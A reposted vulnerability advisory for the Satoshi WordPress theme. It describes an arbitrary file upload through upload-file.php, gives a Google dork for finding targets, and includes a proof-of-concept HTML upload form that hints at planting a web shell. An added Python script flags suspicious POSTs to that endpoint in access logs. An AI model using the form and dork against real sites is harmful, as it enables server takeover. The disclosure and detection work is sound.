Satoshi Theme - File Upload CSRF

Saturday, 26 December 2015


#- Title: Satoshi Theme - File Upload CSRF
#- Author: Cyber_Taregh
#- Date: 2014-12-06
#- Developer : vooshtheme
#- Link Download : wpthemedownload .org/satoshi/
#- Google Dork: inurl:"/Themes/satoshi/"
#- Fixed in Version : -
#- Tested on : linux
======================================================


Classification

Type: CSRF
OWASP Top 10: A8: Cross-Site Request Forgery (CSRF)
CWE: CWE-352

Miscellaneous

Submitter: Anonymous
Views: 750
Verified: No
WPVDB ID: 7709

-- Proof Of Concept --

When vuln : -

CSRF : 


<form enctype="multipart/form-data"
action="http://target .com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

If Success : Succes

Shell Path : Here
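
Because the advisory lists no fixed version, site owners may want to check their access logs for use of this endpoint. The following is an added example, not part of the original advisory or the theme's code: it flags POST requests to the upload-file.php path from the form above whose Referer is missing or points to another site. It assumes the Apache/nginx "combined" log format; the `site_host` parameter, function names and sample log lines are constructed for illustration.

```python
import re

# Endpoint taken from the form action in the advisory.
UPLOAD_PATH = "/wp-content/themes/satoshi/upload-file.php"

# Assumption: Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"'
)
HOST_RE = re.compile(r'^[a-z][a-z0-9+.-]*://(?:[^/@]*@)?([^/:?#]+)', re.I)

def referer_host(referer):
    """Lower-cased host of a Referer value, or '' when absent or unparsable."""
    m = HOST_RE.match(referer)
    return m.group(1).lower() if m else ""

def classify(line, site_host):
    """Return a finding for a POST to the upload endpoint, else None."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "POST":
        return None
    path = m["target"].split("?", 1)[0].lower()
    if not path.endswith(UPLOAD_PATH):
        return None
    host = referer_host(m["referer"])
    if not host:
        origin = "no-referer"   # script, or browser with referrer suppressed
    elif host == site_host.lower():
        origin = "same-site"    # submitted from the site's own pages
    else:
        origin = "cross-site"   # browser sent here by a third-party page
    return {"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "origin": origin, "referer_host": host}

def suspicious_uploads(lines, site_host):
    """Upload POSTs that did not originate from the site's own pages."""
    hits = (classify(line, site_host) for line in lines)
    return [h for h in hits if h and h["origin"] != "same-site"]

# Constructed sample log lines (documentation addresses and domains).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Dec/2014:10:00:01 +0000] "GET /wp-content/themes/satoshi/style.css HTTP/1.1" 200 5120 "http://blog.example.com/" "Mozilla/5.0"',
    '192.0.2.10 - - [06/Dec/2014:10:00:05 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 6 "http://blog.example.com/wp-admin/themes.php" "Mozilla/5.0"',
    '198.51.100.7 - - [06/Dec/2014:10:02:11 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 6 "http://other.example.net/page.html" "Mozilla/5.0"',
    '203.0.113.9 - - [06/Dec/2014:10:03:40 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 6 "-" "curl/7.38.0"',
]
```

A Referer header can be forged by a non-browser client, so a "same-site" result does not prove a request was legitimate; any file written by a flagged request should be reviewed.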
